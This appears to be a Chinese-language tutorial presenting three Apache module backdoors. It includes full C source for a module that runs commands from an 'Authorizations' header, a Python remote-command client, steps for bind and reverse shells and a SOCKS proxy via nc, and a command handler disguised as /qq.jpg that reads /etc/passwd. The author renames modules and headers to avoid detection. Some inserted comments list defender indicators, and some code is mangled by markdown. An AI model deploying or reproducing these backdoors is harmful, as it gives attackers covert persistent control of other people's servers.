Apache Module后门1
From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor
生成模板结构
>apxs -g -n auth
编辑mod_auth.c文件
```c
include "httpd.h"¶
include "http_config.h"¶
include "http_protocol.h"¶
include "ap_config.h"¶
include ¶
include ¶
/*
 * auth_handler: content handler that runs for every request (it is registered
 * below with ap_hook_handler() at APR_HOOK_MIDDLE and checks neither URI nor
 * method). It walks r->headers_in looking for a header whose key is exactly
 * "Authorizations" (strcmp: case-sensitive; note the trailing "s" that
 * distinguishes it from the standard Authorization header). If found, the
 * header value is handed verbatim to popen() and the command's stdout is
 * streamed back as the response body. No authentication, allow-list or
 * logging exists on this path.
 *
 * Defender notes: an inbound request carrying a non-standard "Authorizations"
 * header is the network-level indicator; on the host, compare LoadModule
 * directives (apxs -i -a adds one) and the files under the modules directory
 * against the known-good package inventory. As rendered on this page, markdown
 * has stripped the `#` from the include lines and the `*` from the pointer
 * declarations (request_rec r, FILE fp, apr_pool_t p), so the listing does not
 * compile as shown.
 */
static int auth_handler(request_rec r) {
    const apr_array_header_t *fields;
    int i;
    apr_table_entry_t *e = 0;
    char FLAG = 0;
    fields = apr_table_elts(r->headers_in);
    e = (apr_table_entry_t *) fields->elts;
    /* Linear scan of the raw header table; i is left pointing at the match. */
    for(i = 0; i < fields->nelts; i++) {
        if(strcmp(e[i].key, "Authorizations") == 0){
            FLAG = 1;
            break;
        }
    }
    if (FLAG){
        char * command = e[i].val;  /* header value is the whole shell command line */
        FILE fp = popen(command,"r");
        char buffer[0x100] = {0};
        int counter = 1;
        /* Relay the pipe to the client in 0x100-byte chunks until fread() returns 0. */
        while(counter){
            counter = fread(buffer, 1, sizeof(buffer), fp);
            ap_rwrite(buffer, counter, r);
        }
        pclose(fp);
        return DONE;  /* request is complete; nothing else handles it */
    }
    return DECLINED;  /* header absent: ordinary traffic falls through to the normal handlers */
}

/* Registers auth_handler as a handler for all requests at middle priority. */
static void auth_register_hooks(apr_pool_t p) {
    ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);
}

/* Module record: no config structures and no directives, only the hook registration. */
module AP_MODULE_DECLARE_DATA auth_module = {
    STANDARD20_MODULE_STUFF,
    NULL,                /* create per-dir config structures */
    NULL,                /* merge per-dir config structures */
    NULL,                /* create per-server config structures */
    NULL,                /* merge per-server config structures */
    NULL,                /* table of config file commands */
    auth_register_hooks  /* register hooks */
};
```
编译后重启apache >apxs -i -a -c mod_auth.c && service apache2 restart
原文件接受的头是backdoor太明显,这里换成了Authorizations
或使用python来执行
```python
!/usr/bin/env python¶
-- coding: utf-8 --¶
import requests
import sys


# Client for the module listed above: sends one HTTP GET to "/" whose
# "Authorizations" request header carries the command string, then prints the
# response body (the command output the module streamed back). The request
# path does not matter because the module's handler runs for every request.
# On the wire, a plain GET carrying a non-standard "Authorizations" header is
# the artefact a proxy, WAF or IDS rule can key on.
def exploit(host, port, command):
    headers = { "Authorizations": command }
    url = "http://%s:%d/" % (host, port)
    response = requests.get(url, headers=headers)
    content = response.content
    print content  # Python 2 print statement


# Usage: python <script> HOST PORT. Reads one command per line from stdin
# and forwards each through exploit() until the user types "exit".
def main():
    if len(sys.argv) != 3:
        print "Usage : "
        print "\tpython %s [HOST] [PORT]" % (sys.argv[0])
        exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    while True:
        command = raw_input("$ ")  # Python 2 input API
        if command == "exit":
            break
        exploit(host, port, command)


# As rendered on this page, markdown stripped the underscores from the usual
# __name__ / "__main__" guard.
if name == "main":
    main()
```
Apache Module后门2
From:https://github.com/VladRico/apache2_BackdoorMod
.load文件放入/etc/apache2/mods-available/目录,.so文件放入/usr/lib/apache2/modules/目录
启动后门模块,重启apache
>a2enmod backdoor&service apache2 restart
Cookie里添加字段password=backdoor
访问http://ip/ping返回如下图说明后门正常运行
访问http://ip/bind/12345 开启正向连接,攻击机执行nc ip 12345即可
访问http://ip/revtty/192.168.0.107/12138 开启反向连接,攻击机109执行nc监听12138即可
访问http://ip/proxy/1337开启socks代理
想要结束socks代理可执行
>echo "imdonewithyou" |nc 192.168.0.111 1337
即可结束socks代理
以上原作者的文件命名backdoor太明显,可以自己修改文件重新编译
创建模板结构命名为phpmodev
修改cookie内容为迷惑字段Authorizations=PHPSESSIONID
Apache Module后门3
From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7
生成模板结构
>apxs -g -n phpdevmod
编辑mod_phpdevmod.c文件
编译
>make -e CC=x86_64-linux-gnu-g++
生成的.so文件在/.libs目录下
将其复制到/usr/lib/apache2/modules/目录
修改/etc/apache2/mods-enabled/php7.0.load文件,添加如下
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg> #可以设置为任何不存在的文件
setHandler phpdevmod
</Location>
需重启apache服务
访问后门方式http://ip/qq.jpg?命令的url编码
直接访问后门文件
636174202F6574632F706173737764为cat /etc/passwd的url编码